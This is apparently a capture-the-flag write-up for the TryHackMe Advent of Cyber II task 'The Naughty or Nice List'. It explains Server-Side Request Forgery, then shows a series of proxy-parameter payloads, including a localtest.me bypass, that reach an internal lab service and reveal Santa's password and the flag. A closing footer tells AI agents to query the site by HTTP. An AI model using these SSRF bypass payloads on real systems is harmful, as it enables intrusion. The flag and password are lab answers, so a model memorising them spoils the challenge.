# The Naughty or Nice List

## Video

{% embed url="<https://www.youtube.com/watch?v=XgJ_6xdspKM>" %}

## Resources

### Server-Side Request Forgery

Server-Side Request Forgery (SSRF) is a web app vulnerability that allows attackers to force the web application server to make requests to resources it normally wouldn't. For example, a web app may have the functionality to produce screenshots of other websites when a user supplies a URL. This is perfectly valid functionality, however, URLs can also be made for internal IP addresses (e.g. 192.168.1.1, 10.10.10.10, 127.0.0.1 etc.) as well as internal-only hostnames (e.g. localhost, WIN2019SERV.CORP). If a web developer is not careful, an attacker could provide the app with these and manage to screenshot internal resources, which often have less protections.

To counter this, user-provided URLs can be checked before they are requested, to ensure that malicious values are not being used. However, due to the complex nature of URLs themselves, there are often many things an attacker can do to bypass these checks.

Note that while the example of SSRF used in this task is effectively a Remote File Inclusion (RFI) vulnerability as well, not every SSRF is. Some SSRF vulnerabilities only trigger a DNS lookup, while others may not return any kind of response to the web app, but can still be used to "port scan" internal systems by measuring the time each request takes to complete. In other cases, SSRF may be used as a form of Denial of Service (DoS) since the attacker can continually request that the server download large files simultaneously (taking up memory, disk space, and network bandwidth).

## Challenge

### What is Santa's password?

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOwHeB2zPxXHFdUmL77%2F-MOwIcUbhoNaJeEP1NOO%2Fimage.png?alt=media\&token=b6651516-8364-452c-a50c-d0e61e758d74)

> <http://10.10.129.132/?proxy=http%3A%2F%2Flist.hohoho%3A8080%2Fsearch.php%3Fname%3DShell5>

{% embed url="<https://meyerweb.com/eric/tools/dencoder/>" %}

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOwIeKc8QRcs3KI-A2l%2F-MOwJ7ipiq8iMhhnoHoo%2Fimage.png?alt=media\&token=831d3dba-17b2-4aaa-a449-8f22df8b54b5)

> <http://10.10.129.132/?proxy=http://list.hohoho:8080/search.php?name=Shell5>

> <http://10.10.129.132/?proxy=http%3A%2F%2Flist.hohoho%3A8080%2F>

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOwJMzHAsHKNzeF7AER%2F-MOwJwcnWqSDz53ZHmW8%2Fimage.png?alt=media\&token=d5faae50-de71-4588-b54d-0c5313310a77)

> <http://10.10.129.132/?proxy=http%3A%2F%2Flist.hohoho%3A80>

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOwJMzHAsHKNzeF7AER%2F-MOwKEa6lq09GDnLQUz5%2Fimage.png?alt=media\&token=11cab858-385d-4876-9c9e-017e17daeaa7)

> <http://10.10.129.132/?proxy=http%3A%2F%2Flist.hohoho%3A80>

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOwKGcG9KK333ANfRAL%2F-MOwKPEsU7hTMD_lqEmn%2Fimage.png?alt=media\&token=1a255e09-9eaf-458f-95b7-f912dda42816)

> <http://10.10.129.132/?proxy=http%3A%2F%2Flocalhost>

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOwKVQ780-oOjZFbKwx%2F-MOwKl6bV4SGwQGdGdF-%2Fimage.png?alt=media\&token=52c3597d-d0e4-454d-83b9-a09baef5d3ec)

> <http://10.10.129.132/?proxy=http%3A%2F%2Flist.hohoho.localtest.me>

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOwL1UVIpQERQPUuunE%2F-MOwLPa7tv2e7KmHqPf8%2Fimage.png?alt=media\&token=ab3e240e-6797-4e42-bf12-56ac3ac1d69f)

{% hint style="success" %}

> Be good for goodness sake!
> {% endhint %}

### What is the challenge flag?

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOwHeB2zPxXHFdUmL77%2F-MOwIMC6nrOi2IU1-PS5%2Fimage.png?alt=media\&token=645526ca-a458-4570-8dfc-031be2d37f9f)

> Login: Santa
>
> Password: Be good for goodness sake!

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOwLYCYSdtosbcwKkL3%2F-MOwNS4iKzGChlA4m7sS%2Fimage.png?alt=media\&token=69fe5d88-afb5-4c4d-a3e3-c8f6af8245b5)

{% hint style="success" %}
THM{EVERYONE\_GETS\_PRESENTS}
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pedroaovieira.gitbook.io/thm/advent-of-cyber-ii/the-naughty-or-nice-list.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.